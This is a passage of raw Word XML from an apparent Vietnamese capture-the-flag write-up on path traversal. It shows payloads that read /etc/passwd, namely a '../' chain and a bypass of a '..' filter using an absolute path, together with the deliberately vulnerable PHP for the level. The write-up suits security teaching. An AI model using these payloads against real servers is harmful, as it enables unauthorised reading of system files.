                      <a:ext cx="5731510" cy="2006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F9216" w14:textId="07F12B60" w:rsidR="007F2B73" w:rsidRPr="007F2B73" w:rsidRDefault="007F2B73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007F2B73">
        <w:t>Dựa trên phân tích source code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và ý tưởng</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2B73">
        <w:t xml:space="preserve">, tham số file_name được nối trực tiếp vào đường dẫn /var/www/html/images/ mà không có bất kỳ kiểm tra hay chuẩn hóa nào. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vì vậy mình sẽ thực hiện khai thác </w:t>
      </w:r>
      <w:r w:rsidRPr="007F2B73">
        <w:t>bằng cách sử dụng chuỗi ../ để lùi ra khỏi thư mục images</w:t>
      </w:r>
      <w:r w:rsidR="00494F1D">
        <w:t xml:space="preserve"> sau đó </w:t>
      </w:r>
      <w:r w:rsidR="00494F1D" w:rsidRPr="00494F1D">
        <w:t xml:space="preserve">truy xuất file /etc/passwd — một file hệ thống trên Linux chứa danh sách người </w:t>
      </w:r>
      <w:r w:rsidR="00494F1D">
        <w:t>dùng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2213FF" w14:textId="44605A35" w:rsidR="00623959" w:rsidRDefault="00623959" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00623959">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F716E7B" wp14:editId="46424166">
            <wp:extent cx="5731510" cy="436880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="118793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34692" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="436880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63E3CA" w14:textId="77777777" w:rsidR="009C1A0C" w:rsidRDefault="009C1A0C" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009C1A0C">
        <w:t>Sau khi gửi payload file_name=../../../../../../etc/passwd, hệ thống phản hồi với giao diện hiển thị hình ảnh, tuy nhiên không thể render nội dung file do định dạng không phù hợp với Content-Type: image/png.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116BC083" w14:textId="77777777" w:rsidR="00C17D90" w:rsidRDefault="00C17D90" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A76985" w14:textId="6DC51D28" w:rsidR="009C1A0C" w:rsidRPr="009C1A0C" w:rsidRDefault="009C1A0C" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009C1A0C">
        <w:lastRenderedPageBreak/>
        <w:t>Điều này cho thấy server đã truy xuất thành công file /etc/passwd, nhưng do đây là file văn bản, trình duyệt không thể hiển thị dưới dạng ảnh. Kết quả là khung ảnh bị lỗi hoặc trống.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Để có thể xem nội dung trong file /etc/passwd, mình sẽ sử dụng burp suite</w:t>
      </w:r>
      <w:r w:rsidR="00C17D90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA82C3" w14:textId="0F4F02D1" w:rsidR="00623959" w:rsidRDefault="00623959" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00623959">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="652BD0DC" wp14:editId="23024D4B">
            <wp:extent cx="5731510" cy="1896110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="12071521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52164" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1896110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18835091" w14:textId="2AFAE26F" w:rsidR="00C17D90" w:rsidRDefault="00C17D90" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Toàn bộ thông tin trong /etc/passwd đã được hiển thị cùng với flag của bài được chèn vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30886769" w14:textId="77777777" w:rsidR="00ED0CFF" w:rsidRDefault="00ED0CFF" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687FD807" w14:textId="77777777" w:rsidR="00C17D90" w:rsidRDefault="00C17D90" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1EC6F7" w14:textId="4B291B2F" w:rsidR="00C17D90" w:rsidRPr="00FF23DE" w:rsidRDefault="00C17D90" w:rsidP="004F0B2A">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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3BC11" w14:textId="77777777" w:rsidR="00C17D90" w:rsidRDefault="00C17D90" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thông</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tin source code xử lý chính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EA339D" w:rsidRPr="00EA339D" w14:paraId="58B25195" w14:textId="77777777" w:rsidTr="00EA339D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BEA8C35" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5011B956" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530005F0" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F09F08" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2411BD64" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="579B63BE" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F4E559F" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B37C0A6" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24E6A54E" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6064B2" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7003E5D1" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60946501" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37F3CEBA" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t>$file = $_GET[</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'file'</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F4E769C" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> (strpos($file, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>".."</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve">) !== </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20290BA0" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Hack detected"</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AFC181" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> (file_exists($file)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E9F5D89" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve">    header(</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'Content-Type: image/png'</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D42B49" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve">    readfile($file);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108D532F" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18BCE660" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> { </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// Image file not found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21DEC279" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>" 404 Not Found"</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D76E60" w14:textId="77777777" w:rsidR="00EA339D" w:rsidRPr="00EA339D" w:rsidRDefault="00EA339D" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA339D">
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA339D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="438CC98C" w14:textId="0BACDE88" w:rsidR="00D3144A" w:rsidRPr="004416F6" w:rsidRDefault="004416F6" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004416F6">
        <w:t>Ứng dụng nhận tham số file từ URL thông qua $_GET.</w:t>
      </w:r>
      <w:r w:rsidR="006E703C">
        <w:t xml:space="preserve"> Sau đó k</w:t>
      </w:r>
      <w:r w:rsidRPr="004416F6">
        <w:t>iểm tra nếu chuỗi .. xuất hiện trong giá trị file → chặn ngay với thông báo "Hack detected".</w:t>
      </w:r>
      <w:r w:rsidR="006E703C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004416F6">
        <w:t>Nếu không có .., tiếp tục kiểm tra sự tồn tại của file bằng file_exists().</w:t>
      </w:r>
      <w:r w:rsidR="00D3144A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004416F6">
        <w:t xml:space="preserve">Nếu file tồn tại, hiển thị nội dung dưới dạng ảnh </w:t>
      </w:r>
      <w:r w:rsidR="00D3144A">
        <w:t>PNG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E1FEE" w14:textId="2F2B2816" w:rsidR="00F33549" w:rsidRDefault="00294628" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00294628">
        <w:t xml:space="preserve">Ở level 2, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">đoạn code </w:t>
      </w:r>
      <w:r w:rsidRPr="00294628">
        <w:t xml:space="preserve">đã filter '..' và không thể sử dụng cách path traversal như đã làm ở level </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 nhưng </w:t>
      </w:r>
      <w:r w:rsidRPr="00A636E7">
        <w:t>cách kiểm tra này vẫn có thể bị bypass bằng các kỹ thuật mã hóa hoặc biến thể chuỗi, khiến lỗ hổng truy xuất file tùy ý vẫn tồn tại như ở Level 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43084ED9" w14:textId="7B020DEF" w:rsidR="00F33549" w:rsidRDefault="00F33549" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ngoài ra, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F33549">
        <w:t>đoạn mã</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> này</w:t>
      </w:r>
      <w:r w:rsidRPr="00F33549">
        <w:t xml:space="preserve"> nhận tham số file từ URL và sử dụng trực tiếp làm đường dẫn file mà không hề gắn thêm tiền tố thư mục như ở Level 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BC148" w14:textId="4A2B46C5" w:rsidR="00A636E7" w:rsidRDefault="00F0745F" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CE233A" w14:textId="6C909BC0" w:rsidR="005D25EF" w:rsidRPr="00A636E7" w:rsidRDefault="005D25EF" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005D25EF">
        <w:t>Thay vì sử dụng chuỗi ../ để lùi thư mục như cách khai thác truyền thống, ta có thể truyền trực tiếp đường dẫn tuyệt đối đến file hệ thống — ví dụ /etc/passwd. Cách này không chứa chuỗi "..", do đó dễ dàng vượt qua lớp kiểm tra đầu vào đơn giản của ứng dụng và truy xuất thành công nội dung file nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539EB9CC" w14:textId="77777777" w:rsidR="00F0745F" w:rsidRPr="00184ED1" w:rsidRDefault="00F0745F" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD12458" w14:textId="43C3CD9B" w:rsidR="00917FED" w:rsidRPr="00917FED" w:rsidRDefault="00917FED" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00917FED">
        <w:t xml:space="preserve">Để kiểm tra hiệu quả của cơ chế bảo vệ tại Level 2, </w:t>
      </w:r>
      <w:r>
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00917FED">
        <w:t xml:space="preserve"> thử truyền lại payload đã khai thác thành công ở Level 1 — sử dụng chuỗi ../ để lùi thư mục và truy xuất file hệ </w:t>
      </w:r>
      <w:r>
        <w:t>thống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3438C606" w14:textId="73507A47" w:rsidR="000A0F15" w:rsidRDefault="00F0173B" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F0173B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="716FDFF7" wp14:editId="5FC190EB">
            <wp:extent cx="5731510" cy="388620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="52516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62553" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="388620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E279E4A" w14:textId="18DD7F51" w:rsidR="00900DB1" w:rsidRDefault="00900DB1" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00900DB1">
        <w:t>Tại Level 2, ứng dụng thực hiện kiểm tra chuỗi ".." trong tham số file. Do payload chứa ../, hệ thống sẽ phát hiện và trả về thông báo "Hack detected".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD31A60" w14:textId="366FC852" w:rsidR="00900DB1" w:rsidRPr="00900DB1" w:rsidRDefault="00900DB1" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00053D51">
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00900DB1">
        <w:t xml:space="preserve">truyền trực tiếp đường dẫn tuyệt đối </w:t>
      </w:r>
      <w:r w:rsidR="00053D51" w:rsidRPr="00053D51">
        <w:t>/etc/</w:t>
      </w:r>
      <w:r w:rsidR="00053D51">
        <w:t>passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F09F91" w14:textId="743E03FC" w:rsidR="00F0173B" w:rsidRDefault="00FC27D9" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC27D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A2BDF66" wp14:editId="7A7F8452">
            <wp:extent cx="5731510" cy="430530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="22268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88423" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="430530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2977A196" w14:textId="68ECF062" w:rsidR="00053D51" w:rsidRDefault="00053D51" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thông tin của file /etc/passwd đã được hiển thị bao gồm cả flag của bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EB008C" w14:textId="73F0999F" w:rsidR="00FC27D9" w:rsidRDefault="00FC27D9" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC27D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7042504F" wp14:editId="3A3A3684">
            <wp:extent cx="5731510" cy="2591435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8664459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45941" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2591435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04196C6C" w14:textId="5E6125D4" w:rsidR="006C3F57" w:rsidRDefault="000763AA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="637A9FF8" w14:textId="6EF7F229" w:rsidR="000763AA" w:rsidRPr="00FF23DE" w:rsidRDefault="000763AA" w:rsidP="004F0B2A">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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4ED29" w14:textId="587736F8" w:rsidR="006C3F57" w:rsidRDefault="00ED7FF3" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kiểm tra cấu hình file config:</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564938" w:rsidRPr="00564938" w14:paraId="11E5E750" w14:textId="77777777" w:rsidTr="00564938">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
